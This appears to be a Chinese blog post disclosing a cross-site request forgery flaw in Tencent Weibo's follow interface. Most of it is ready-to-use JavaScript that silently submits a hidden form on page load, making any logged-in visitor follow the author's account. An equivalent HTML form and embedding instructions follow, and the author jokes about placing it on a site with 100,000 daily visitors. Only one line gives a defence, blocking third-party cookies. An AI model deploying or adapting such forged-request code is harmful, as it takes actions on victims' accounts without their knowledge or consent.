注意:此程序危害等级极高,如果挂在一日ip十万的站上,哈哈。
请勿滥用,不然大家都没得玩了。
我的微博 t.qq.com/a550444898
Information:
腾讯开放平台的官方应用都是不需要授权的,因为是利用微博应用接口获取用户cookie完成操作的,
而应用接口几乎没有做任何过滤,所以我们就可以利用应用接口干些我们想干的事。
不过这个接口也有不足的地方,因为IE内核的浏览器默认设置是阻止任何第三方cookie的
所以IE用户每次打开浏览器都需要重新登陆一次web微博才能操作,这算是接口的一个bug吧,因为腾讯本意不是这样的。
接口使用很简单,只需要post发送用户名和sign到接口就ok了,sign在每个官方应用里都有的。
比如我的”签名档”应用图片地址是”http;//v.t.qq.com/a550444898/Tueurs/1cb7bc9dd60c9fe7ccf2b5a20d0d835ebba46db5/4.jpg“
其中的”1cb7bc9dd60c9fe7ccf2b5a20d0d835ebba46db5“就是我的sign。
防范:可以设置浏览器阻止任何第三方cookie。
利用程序代码:
//Author:L,xJ
//Blog:
www.icefeng.info//谢谢。
var t_name = “Tueurs”;//改成你微博用户名
var t_sign = “1cb7bc9dd60c9fe7ccf2b5a20d0d835ebba46db5″;//改成你的微博sign码
function postdata(path, params, method) {
method = method || “post”;
var form = document.createElement(“form”);
if(navigator.appName == “Microsoft Internet Explorer”){
var ifm = document.createElement(‘<iframe name=”fuckForm” style=”display:none”/>’);
}else{
var ifm = document.createElement(“iframe”);
ifm.setAttribute(“name”,”fuckForm”);
ifm.setAttribute(“style”,”display:none”);
}
form._submit_function_ = form.submit;
form.setAttribute(“method”, method);
form.setAttribute(“action”, path);
form.setAttribute(“target”,”fuckForm”)
for(var key in params) {
var hiddenField = document.createElement(“input”);
hiddenField.setAttribute(“type”, “hidden”);
hiddenField.setAttribute(“name”, key);
hiddenField.setAttribute(“value”, params[key]);
form.appendChild(hiddenField);
}
document.body.appendChild(ifm);
document.body.appendChild(form);
form._submit_function_();
}
function fuck() {
postdata(“
http://v.t.qq.com/cgi-bin/follow”, { name: t_name ,sign:t_sign});
}
fuck();
//把以上代码保存在一个.js文件里,然后在任意页面引用。例:<script src=”name.js”></script>
//任何登陆过web微博的用户访问这个页面都会收听你
上面是js写的,其实就是实现了以下效果(html你们懂的):
<form action=”
http://v.t.qq.com/cgi-bin/follow” method=”post”>
name:
<input type=”text” name=”name” value=”Tueurs”/><br />
sign:
<input type=”text” name=”sign” value=”1cb7bc9dd60c9fe7ccf2b5a20d0d835ebba46db5″/><br />
<input type=”submit” value=”收听”/>
</form>
